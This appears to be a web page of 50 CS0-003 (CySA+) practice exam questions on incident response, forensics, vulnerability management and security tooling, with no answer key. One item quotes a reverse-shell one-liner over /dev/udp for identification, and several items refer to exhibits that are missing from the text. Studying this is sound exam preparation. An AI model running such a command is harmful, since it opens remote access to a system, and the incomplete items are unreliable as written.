CS0-003 Practice Questions Free – 50 Exam-Style Questions to Sharpen Your Skills
Are you preparing for the CS0-003 certification exam? Kickstart your success with our CS0-003 Practice Questions Free – a carefully selected set of 50 real exam-style questions to help you test your knowledge and identify areas for improvement.
Practicing with CS0-003 practice questions free gives you a powerful edge by allowing you to:
- Understand the exam structure and question formats
- Discover your strong and weak areas
- Build the confidence you need for test day success
Below, you will find 50 free CS0-003 practice questions designed to match the real exam in both difficulty and topic coverage. They are ideal for self-assessment or final review.
A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?
A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.
While reviewing web server logs, a security analyst found the following line: Which of the following malicious activities was attempted?
A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications
An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?
A. The finding is a false positive and should be ignored.
B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.
A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?
A. A vulnerability that has related threats and IoCs, targeting a different industry
B. A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM
C. A vulnerability that has no adversaries using it or associated IoCs
D. A vulnerability that is related to an isolated system, with no IoCs
An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
A. Disable the user’s network account and access to web resources.
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA-1 hash.
The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?
A. PCI DSS
B. COBIT
C. ISO 27001
D. ITIL
Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?
A. Hacktivist threat
B. Advanced persistent threat
C. Unintentional insider threat
D. Nation-state threat
A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data?
A. To identify regulatory compliance requirements
B. To facilitate the creation of DLP rules
C. To prioritize IT expenses
D. To establish the value of data to the organization
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?
A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication
An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?
A. Publicly disclose the request to other vendors
B. Notify the departments involved to preserve potentially relevant information
C. Establish a chain of custody starting with the attorney’s request
D. Back up the mailboxes on the server and provide the attorney with a copy
Which of the following best describes the goal of a tabletop exercise?
A. To test possible incident scenarios and how to react properly
B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan
Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?
A. Deploy a database to aggregate the logging
B. Configure the servers to forward logs to a SIEM
C. Share the log directory on each server to allow local access.
D. Automate the emailing of logs to the analysts.
Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?
A. Mean time to detect
B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime
A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?
A. SIEM
B. XDR
C. SOAR
D. EDR
Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
A. Isolate Joe’s PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe’s PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps
An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R Which of the following represents the exploit code maturity of this critical vulnerability?
A. E:U
B. S:C
C. RC:R
D. AV:N
E. AC:L
Which of the following evidence collection methods is most likely to be acceptable in court cases?
A. Copying all access files at the time of the incident
B. Creating a file-level archive of all files
C. Providing a full system backup inventory
D. Providing a bit-level image of the hard drive
Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?
A. To ensure the report is legally acceptable in case it needs to be presented in court
B. To present a lessons-learned analysis for the incident response team
C. To ensure the evidence can be used in a postmortem analysis
D. To prevent the possible loss of a data source for further root cause analysis
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
A. C2 beaconing activity
B. Data exfiltration
C. Anomalous activity on unexpected ports
D. Network host IP address scanning
E. A rogue network device
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed: Which of the following tuning recommendations should the security analyst share?
A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header
Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?
A. MOU
B. NDA
C. BIA
D. SLA
A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?
A. Scan the employee’s computer with virus and malware tools
B. Review the actions taken by the employee and the email related to the event
C. Contact human resources and recommend the termination of the employee
D. Assign security awareness training to the employee involved in the incident
A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization’s environment. An analyst views the details of these events below: Which of the following statements best describes the intent of the attacker, based on this one-liner?
A. Attacker is escalating privileges via JavaScript.
B. Attacker is utilizing custom malware to download an additional script.
C. Attacker is executing PowerShell script “AccessToken.ps1”.
D. Attacker is attempting to install persistence mechanisms on the target machine.
A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?
A. Running regular penetration tests to identify and address new vulnerabilities.
B. Conducting regular security awareness training of employees to prevent social engineering attacks.
C. Deploying an additional layer of access controls to verify authorized individuals.
D. Implementing intrusion detection software to alert security teams of unauthorized access attempts
A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)
A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level
B. Review the headers from the forwarded email
C. Examine the recipient address field
D. Review the Content-Type header
E. Evaluate the HELO or EHLO string of the connecting email server
F. Examine the SPF, DKIM, and DMARC fields from the original email
A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?
A. Enabling a user account lockout after a limited number of failed attempts
B. Installing a third-party remote access tool and disabling RDP on all devices
C. Implementing a firewall block for the remote system’s IP address
D. Increasing the verbosity of log-on event auditing on all devices
A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS 3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below: Which of the following systems should be prioritized for patching?
A. brown
B. grey
C. blane
D. sullivan
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?
A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short }
D. function z() { c=$(geoiplookup $1) && echo "$1 | $c" }
To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization’s cloud services. Which of the following security controls has the analyst configured?
A. Preventive
B. Corrective
C. Directive
D. Detective
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding
A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
A. Leave the proxy as is.
B. Decommission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.
A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
A. Potential precursor to an attack
B. Unauthorized peer-to-peer communication
C. Rogue device on the network
D. System updates
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?
A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.
A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed?
A. SIEM
B. SOAR
C. IPS
D. CERT
A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?
A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK
After reviewing the final report for a penetration test, a cybersecurity analyst prioritizes the remediation for input validation vulnerabilities. Which of the following attacks is the analyst seeking to prevent?
A. DNS poisoning
B. Pharming
C. Phishing
D. Cross-site scripting
Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
A. Log retention
B. Log rotation
C. Maximum log size
D. Threshold value
Which of the following risk management principles is accomplished by purchasing cyber insurance?
A. Accept
B. Avoid
C. Mitigate
D. Transfer
A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?
A. Nmap
B. TCPDump
C. SIEM
D. EDR
Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.)
A. Performing dynamic application security testing
B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS
A security analyst is reviewing the following alert that was triggered by FIM on a critical system: Which of the following best describes the suspicious activity that is occurring?
A. A fake antivirus program was installed by the user.
B. A network drive was added to allow exfiltration of data.
C. A new program has been set to execute on system start.
D. The host firewall on 192.168.1.10 was disabled.
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster
An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?
A. DLP
B. NAC
C. EDR
D. NIDS
A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident?
A. Back up the configuration file for all network devices.
B. Record and validate each connection.
C. Create a full diagram of the network infrastructure.
D. Take photos of the impacted items.
A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?
A. Corrective controls
B. Compensating controls
C. Operational controls
D. Administrative controls
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>&1 Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report
We update our question sets regularly, so check back often for new and relevant content.
Good luck with your CS0-003 certification journey!